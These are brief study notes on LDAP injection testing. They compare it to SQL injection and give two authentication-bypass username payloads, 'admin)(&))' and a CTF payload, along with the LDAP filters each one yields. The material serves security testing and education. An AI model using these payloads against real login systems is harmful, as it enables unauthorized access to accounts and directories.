LDAP injection testing is similar to SQL Injection testing. The differences are that testers use the LDAP protocol instead of SQL and the target is an LDAP Server instead of a SQL Server. An LDAP Injection attack breaks the following pattern:
Input -> Query LDAP == LDAP injection
Enter admin)(&)) in username to bypass authentication
Making Uname=admin)(&)) and introducing any string as the Pwd value, the following query is constructed and sent to the server:
(& (USER=admin)(&))(PASSWORD=Pwd))
From CTF LDAP Authentication challenge:
username=)(|(uid=&password=)
Should give this string: (&(uid=)(|(uid=)(userPassword=)))